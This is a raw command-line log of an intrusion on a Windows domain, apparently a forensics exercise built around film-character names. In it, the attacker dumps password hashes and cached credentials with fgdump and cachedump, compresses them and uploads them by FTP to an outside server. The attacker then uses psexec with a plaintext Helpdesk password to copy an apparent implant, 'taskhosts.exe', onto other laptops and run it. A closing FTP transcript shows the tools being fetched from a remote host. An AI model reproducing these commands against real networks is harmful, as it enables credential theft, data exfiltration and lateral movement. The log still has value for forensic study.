C:\WINDOWS\WBEM>UserInfo.exe \\10.10.53.2 rsanchez
UserInfo.exe \\10.10.53.2 rsanchez

	UserInfo v1.5 - thor@hammerofgod.com 

	Querying Controller \\10.10.53.2

	USER INFO
	Username:       rsanchez
	Full Name:      Ramon Sanchez
	Comment:        
	User Comment:   
	User ID:        1163
	Primary Grp:    513
	Privs:          User Privs
	OperatorPrivs:  No explicit OP Privs

	SYSTEM FLAGS (Flag dword is 513)

	MISC INFO
	Password age: 	Tue Feb 14 16:22:21 2012
	LastLogon:    	Fri Mar 09 01:00:00 2012
	LastLogoff:   	Thu Jan 01 00:00:00 1970
	Acct Expires:   Never 
	Max Storage:    Unlimited 
	Workstations:   
	UnitsperWeek:   168
	Bad pw Count:   0
	Num logons:     290
	Country code:   0
	Code page:      0
	Profile:        
	ScriptPath:     
	Homedir drive:  
	Home Dir:       
	PasswordExp:    0

	Logon hours at controller, GMT:
	Hours-          12345678901N12345678901M
	Sunday          111111111111111111111111
	Monday          111111111111111111111111
	Tuesday         111111111111111111111111
	Wednesday       111111111111111111111111
	Thursday        111111111111111111111111
	Friday          111111111111111111111111
	Saturday        111111111111111111111111

	Get hammered at HammerofGod.com! 

C:\WINDOWS\WBEM>mkdir F1
mkdir F1

C:\WINDOWS\WBEM>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 08FE-2AA7

 Directory of C:\WINDOWS\WBEM

03/08/2012  09:11 PM    <DIR>          .
03/08/2012  09:11 PM    <DIR>          ..
03/08/2012  09:08 PM               226 10.10.53.2.cachedump
03/08/2012  09:08 PM             5,973 10.10.53.2.pwdump
03/08/2012  09:08 PM               714 2012-03-09-02-08-20.fgdump-log
03/08/2012  09:00 PM           587,776 7za.exe
03/06/2012  02:34 PM            73,802 asdf.exe
03/06/2012  02:41 PM            49,152 cachedump.exe
03/08/2012  09:00 PM         1,098,540 d.7z
03/06/2012  02:41 PM            49,152 enum.exe
03/08/2012  09:11 PM    <DIR>          F1
03/06/2012  02:41 PM           974,848 fgdump.exe
03/08/2012  09:00 PM               100 ftp_helo.txt
03/06/2012  10:34 PM            94,208 HoboCopy.exe
01/07/2009  06:21 PM             1,876 msfeeds.mof
01/07/2009  06:21 PM             1,938 msfeedsbs.mof
03/06/2012  02:41 PM            59,392 nc.exe
03/06/2012  02:41 PM           146,704 pdh.dll
03/06/2012  02:41 PM           229,376 plink.exe
03/06/2012  02:42 PM           131,072 psexec.exe
03/06/2012  11:23 PM            94,208 pskill.exe
02/23/2012  11:12 AM             8,704 taskhosts.exe
03/06/2012  03:48 PM           200,779 UserInfo.exe
03/06/2012  02:42 PM           308,736 wget.exe
              21 File(s)      4,117,276 bytes
               3 Dir(s)   7,726,768,128 bytes free

C:\WINDOWS\WBEM>copy ftp* F1\
copy ftp* F1\
ftp_bye.txt
ftp_helo.txt
        2 file(s) copied.

C:\WINDOWS\WBEM>copy 10.10.53.* F1\
copy 10.10.53.* F1\
10.10.53.2.cachedump
10.10.53.2.pwdump
        2 file(s) copied.

C:\WINDOWS\WBEM>cp 7za.exe F1\
cp 7za.exe F1\
'cp' is not recognized as an internal or external command,
operable program or batch file.

C:\WINDOWS\WBEM>cd F1
cd F1

C:\WINDOWS\WBEM\F1>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 08FE-2AA7

 Directory of C:\WINDOWS\WBEM\F1

03/08/2012  09:11 PM    <DIR>          .
03/08/2012  09:11 PM    <DIR>          ..
03/08/2012  09:08 PM               226 10.10.53.2.cachedump
03/08/2012  09:08 PM             5,973 10.10.53.2.pwdump
03/08/2012  09:11 PM                85 ftp_bye.txt
03/08/2012  09:00 PM               100 ftp_helo.txt
               4 File(s)          6,384 bytes
               2 Dir(s)   7,726,759,936 bytes free

C:\WINDOWS\WBEM\F1>cd ..
cd ..

C:\WINDOWS\WBEM>copy 7za.exe F1
copy 7za.exe F1
        1 file(s) copied.

C:\WINDOWS\WBEM>cd F1
cd F1

C:\WINDOWS\WBEM\F1>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 08FE-2AA7

 Directory of C:\WINDOWS\WBEM\F1

03/08/2012  09:12 PM    <DIR>          .
03/08/2012  09:12 PM    <DIR>          ..
03/08/2012  09:08 PM               226 10.10.53.2.cachedump
03/08/2012  09:08 PM             5,973 10.10.53.2.pwdump
03/08/2012  09:00 PM           587,776 7za.exe
03/08/2012  09:11 PM                85 ftp_bye.txt
03/08/2012  09:00 PM               100 ftp_helo.txt
               5 File(s)        594,160 bytes
               2 Dir(s)   7,726,166,016 bytes free

C:\WINDOWS\WBEM\F1>7za.exe a a.7z 10.10.53.*
7za.exe a a.7z 10.10.53.*

7-Zip (A) 9.20  Copyright (c) 1999-2010 Igor Pavlov  2010-11-18
Scanning

Creating archive a.7z

Compressing  10.10.53.2.cachedump
Compressing  10.10.53.2.pwdump

Everything is Ok

C:\WINDOWS\WBEM\F1>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 08FE-2AA7

 Directory of C:\WINDOWS\WBEM\F1

03/08/2012  09:12 PM    <DIR>          .
03/08/2012  09:12 PM    <DIR>          ..
03/08/2012  09:08 PM               226 10.10.53.2.cachedump
03/08/2012  09:08 PM             5,973 10.10.53.2.pwdump
03/08/2012  09:00 PM           587,776 7za.exe
03/08/2012  09:12 PM             2,390 a.7z
03/08/2012  09:11 PM                85 ftp_bye.txt
03/08/2012  09:00 PM               100 ftp_helo.txt
               6 File(s)        596,550 bytes
               2 Dir(s)   7,726,145,536 bytes free

C:\WINDOWS\WBEM\F1>ftp -i -s:ftp_bye.txt
ftp -i -s:ftp_bye.txt
User (203.57.206.173:(none)): open 203.57.206.173


bin
cd dump/
mput "*.7z"
disconnect
bye

C:\WINDOWS\WBEM\F1>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 08FE-2AA7

 Directory of C:\WINDOWS\WBEM\F1

03/08/2012  09:12 PM    <DIR>          .
03/08/2012  09:12 PM    <DIR>          ..
03/08/2012  09:08 PM               226 10.10.53.2.cachedump
03/08/2012  09:08 PM             5,973 10.10.53.2.pwdump
03/08/2012  09:00 PM           587,776 7za.exe
03/08/2012  09:12 PM             2,390 a.7z
03/08/2012  09:11 PM                85 ftp_bye.txt
03/08/2012  09:00 PM               100 ftp_helo.txt
               6 File(s)        596,550 bytes
               2 Dir(s)   7,726,145,536 bytes free

C:\WINDOWS\WBEM\F1>cd ..
cd ..

C:\WINDOWS\WBEM>net view
net view
Server Name            Remark

-------------------------------------------------------------------------------
\\SICCO38K16           Marsellus Wallace Workstation                           
\\SICCO446EQ           Darren Roskow Laptop                                    
\\SICCO4IF54           Lando Calrissian Laptop                                 
\\SICCO4U9BJ           Martin Bishops Laptop                                   
\\SICCO8BF37           Stanley Jobson Laptop                                   
\\SICCO9AD70           Ellen Ripley Laptop                                     
\\SICCOHJ8Q1           Vincent Vega Laptop                                     
\\SICCOM4094           Ramon Sanchez Laptop                                    
\\SICCORV5LN           Hugo Stiglitz Workstation                               
\\SICCOSVR01                                                                   
\\SICCOSVR02                                                                   
\\SICCOSVR04                                                                   
\\SICCOSVR05                                                                   
\\SICCOT53Q2           Donny Kerabatsos Laptop                                 
\\SICCOVZGZ5           Jules Winnfield Laptop                                  
The command completed successfully.


C:\WINDOWS\WBEM>psexec.exe
psexec.exe

PsExec v1.63 - Execute processes remotely
Copyright (C) 2001-2005 Mark Russinovich
Sysinternals - www.sysinternals.com

PsExec executes a program on a remote system, where remotely executed console
applications execute interactively.

Usage: psexec [\\computer[,computer2[,...] | @file][-u user [-p psswd]][-n s][-s|-e][-i][-c [-f|-v]][-w directory][-d][-<priority>][-a n,n,...] cmd [arguments]
     -a         Separate processors on which the application can run with
                commas where 1 is the lowest numbered CPU. For example,
                to run the application on CPU 2 and CPU 4, enter:
                "-a 2,4"
     -c         Copy the specified program to the remote system for
                execution. If you omit this option the application
                must be in the system path on the remote system.
     -d         Don't wait for process to terminate (non-interactive).
     -e         Loads the specified account's profile.
     -f         Copy the specified program even if the file already
                exists on the remote system.
     -i         Run the program so that it interacts with the desktop on the
                remote system.
     -n         Specifies timeout in seconds connecting to remote computers.
     -p         Specifies optional password for user name. If you omit this
                you will be prompted to enter a hidden password.
     -s         Run the remote process in the System account.
     -u         Specifies optional user name for login to remote
                computer.
     -v         Copy the specified file only if it has a higher version number
                or is newer on than the one on the remote system.
     -w         Set the working directory of the process (relative to
                remote computer).
     -priority	Specifies -low, -belownormal, -abovenormal, -high or
                -realtime to run the process at a different priority.
     computer   Direct PsExec to run the application on the remote
                computer or computers specified. If you omit the computer
                name PsExec runs the application on the local system, 
                and if you specify a wildcard (\\*), PsExec runs the
                command on all computers in the current domain.
     @file      PsExec will execute the command on each of the computers listed
                in the file.
     program    Name of application to execute.
     arguments  Arguments to pass (note that file paths must be
                absolute paths on the target system).

You can enclose applications that have spaces in their name with
quotation marks e.g. psexec \\marklap "c:\long name app.exe".
Input is only passed to the remote system when you press the enter
key, and typing Ctrl-C terminates the remote process.

If you omit a user name the process will run in the context of your
account on the remote system, but will not have access to network
resources (because it is impersonating). Specify a valid user name
in the Domain\User syntax if the remote process requires access
to network resources or to run in a different account. Note that
the password is transmitted in clear text to the remote system.

Error codes returned by PsExec are specific to the applications you
execute, not PsExec.


C:\WINDOWS\WBEM>psexec.exe \\SICCOVZGZ5 -u Helpdesk -p H3lp0M3!! tasklist
psexec.exe \\SICCOVZGZ5 -u Helpdesk -p H3lp0M3!! tasklist

PsExec v1.63 - Execute processes remotely
Copyright (C) 2001-2005 Mark Russinovich
Sysinternals - www.sysinternals.com

Logon failure: unknown user name or bad password.
Connecting to SICCOVZGZ5...
                                                                              

Starting PsExec service on SICCOVZGZ5...
                                                                              

Connecting with PsExec service on SICCOVZGZ5...
                                                                              

Starting tasklist on SICCOVZGZ5...
                                                                              



                                                                              

PsExec could not start tasklist on SICCOVZGZ5:

C:\WINDOWS\WBEM>psexec.exe \\SICCOVZGZ5 -u SICCOINC\Helpdesk -p H3lp0M3!! tasklist
psexec.exe \\SICCOVZGZ5 -u SICCOINC\Helpdesk -p H3lp0M3!! tasklist

PsExec v1.63 - Execute processes remotely
Copyright (C) 2001-2005 Mark Russinovich
Sysinternals - www.sysinternals.com


Connecting to SICCOVZGZ5...
                                                                              

Starting PsExec service on SICCOVZGZ5...
                                                                              

Connecting with PsExec service on SICCOVZGZ5...
                                                                              

Starting tasklist on SICCOVZGZ5...
                                                                              


tasklist exited on SICCOVZGZ5 with error code 0.

C:\WINDOWS\WBEM>net use
net use
New connections will be remembered.


Status       Local     Remote                    Network

-------------------------------------------------------------------------------
Disconnected S:        \\10.10.53.180\share      Microsoft Windows Network
The command completed successfully.


C:\WINDOWS\WBEM>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 08FE-2AA7

 Directory of C:\WINDOWS\WBEM

03/08/2012  09:11 PM    <DIR>          .
03/08/2012  09:11 PM    <DIR>          ..
03/08/2012  09:08 PM               226 10.10.53.2.cachedump
03/08/2012  09:08 PM             5,973 10.10.53.2.pwdump
03/08/2012  09:08 PM               714 2012-03-09-02-08-20.fgdump-log
03/08/2012  09:00 PM           587,776 7za.exe
03/06/2012  02:34 PM            73,802 asdf.exe
03/06/2012  02:41 PM            49,152 cachedump.exe
03/08/2012  09:00 PM         1,098,540 d.7z
03/06/2012  02:41 PM            49,152 enum.exe
03/08/2012  09:12 PM    <DIR>          F1
03/06/2012  02:41 PM           974,848 fgdump.exe
03/08/2012  09:11 PM                85 ftp_bye.txt
03/08/2012  09:00 PM               100 ftp_helo.txt
03/06/2012  10:34 PM            94,208 HoboCopy.exe
01/07/2009  06:21 PM             1,876 msfeeds.mof
01/07/2009  06:21 PM             1,938 msfeedsbs.mof
03/06/2012  02:41 PM            59,392 nc.exe
03/06/2012  02:41 PM           146,704 pdh.dll
03/06/2012  02:41 PM           229,376 plink.exe
03/06/2012  02:42 PM           131,072 psexec.exe
03/06/2012  11:23 PM            94,208 pskill.exe
02/23/2012  11:12 AM             8,704 taskhosts.exe
03/06/2012  03:48 PM           200,779 UserInfo.exe
03/06/2012  02:42 PM           308,736 wget.exe
              22 File(s)      4,117,361 bytes
               3 Dir(s)   7,726,067,712 bytes free

C:\WINDOWS\WBEM>psexec.exe \\SICCOVZGZ5 -u SICCOINC\Helpdesk -p H3lp0M3!! -c -d taskhosts.exe
psexec.exe \\SICCOVZGZ5 -u SICCOINC\Helpdesk -p H3lp0M3!! -c -d taskhosts.exe

PsExec v1.63 - Execute processes remotely
Copyright (C) 2001-2005 Mark Russinovich
Sysinternals - www.sysinternals.com

Connecting to SICCOVZGZ5...
                                                                              

Starting PsExec service on SICCOVZGZ5...
                                                                              

Connecting with PsExec service on SICCOVZGZ5...
                                                                              

Copying taskhosts.exe to SICCOVZGZ5...
                                                                              

Starting taskhosts.exe on SICCOVZGZ5...
                                                                              


taskhosts.exe started on SICCOVZGZ5 with process ID 3752.

C:\WINDOWS\WBEM>net view
net view
Server Name            Remark

-------------------------------------------------------------------------------
\\SICCO38K16           Marsellus Wallace Workstation                           
\\SICCO446EQ           Darren Roskow Laptop                                    
\\SICCO4IF54           Lando Calrissian Laptop                                 
\\SICCO4U9BJ           Martin Bishops Laptop                                   
\\SICCO8BF37           Stanley Jobson Laptop                                   
\\SICCO9AD70           Ellen Ripley Laptop                                     
\\SICCOHJ8Q1           Vincent Vega Laptop                                     
\\SICCOM4094           Ramon Sanchez Laptop                                    
\\SICCORV5LN           Hugo Stiglitz Workstation                               
\\SICCOSVR01                                                                   
\\SICCOSVR02                                                                   
\\SICCOSVR04                                                                   
\\SICCOSVR05                                                                   
\\SICCOT53Q2           Donny Kerabatsos Laptop                                 
\\SICCOVZGZ5           Jules Winnfield Laptop                                  
The command completed successfully.


C:\WINDOWS\WBEM>psexec.exe \\SICCORV5LN -u SICCOINC\Helpdesk -p H3lp0M3!! -c -d taskhosts.exe
psexec.exe \\SICCORV5LN -u SICCOINC\Helpdesk -p H3lp0M3!! -c -d taskhosts.exe

PsExec v1.63 - Execute processes remotely
Copyright (C) 2001-2005 Mark Russinovich
Sysinternals - www.sysinternals.com

Connecting to SICCORV5LN...
                                                                              

Starting PsExec service on SICCORV5LN...
                                                                              

Connecting with PsExec service on SICCORV5LN...
                                                                              

Copying taskhosts.exe to SICCORV5LN...
                                                                              

Starting taskhosts.exe on SICCORV5LN...
                                                                              


taskhosts.exe started on SICCORV5LN with process ID 3416.

C:\WINDOWS\WBEM>psexec.exe \\SICCORV5LN -u SICCOINC\Helpdesk -p H3lp0M3!! tasklist
psexec.exe \\SICCORV5LN -u SICCOINC\Helpdesk -p H3lp0M3!! tasklist

PsExec v1.63 - Execute processes remotely
Copyright (C) 2001-2005 Mark Russinovich
Sysinternals - www.sysinternals.com


Connecting to SICCORV5LN...
                                                                              

Starting PsExec service on SICCORV5LN...
                                                                              

Connecting with PsExec service on SICCORV5LN...
                                                                              

Starting tasklist on SICCORV5LN...
                                                                              


tasklist exited on SICCORV5LN with error code 0.

C:\WINDOWS\WBEM>psexec.exe \\SICCORV5LN -u SICCOINC\Helpdesk -p H3lp0M3!! ipconfig
psexec.exe \\SICCORV5LN -u SICCOINC\Helpdesk -p H3lp0M3!! ipconfig

PsExec v1.63 - Execute processes remotely
Copyright (C) 2001-2005 Mark Russinovich
Sysinternals - www.sysinternals.com



Windows IP Configuration





Ethernet adapter Local Area Connection:



        Connection-specific DNS Suffix  . : siccoinc.com

        IP Address. . . . . . . . . . . . : 10.10.54.113

        Subnet Mask . . . . . . . . . . . : 255.255.255.0

        Default Gateway . . . . . . . . . : 10.10.54.1

Connecting to SICCORV5LN...
                                                                              

Starting PsExec service on SICCORV5LN...
                                                                              

Connecting with PsExec service on SICCORV5LN...
                                                                              

Starting ipconfig on SICCORV5LN...
                                                                              


ipconfig exited on SICCORV5LN with error code 0.

C:\WINDOWS\WBEM>exit
exit

```

### FTP downloads of tools

```
220 (vsFTPd 2.2.2)
USER root
331 Please specify the password.
PASS generic
230 Login successful.
TYPE I
200 Switching to Binary mode.
CWD tools/
250 Directory successfully changed.
PORT 209,242,181,33,81,171
200 PORT command successful. Consider using PASV.
RETR 7za.exe
150 Opening BINARY mode data connection for 7za.exe (587776 bytes).
226 Transfer complete.
PORT 209,242,181,33,129,96
200 PORT command successful. Consider using PASV.
RETR d.7z
150 Opening BINARY mode data connection for d.7z (1098540 bytes).
226 Transfer complete.
QUIT
221 Goodbye.
```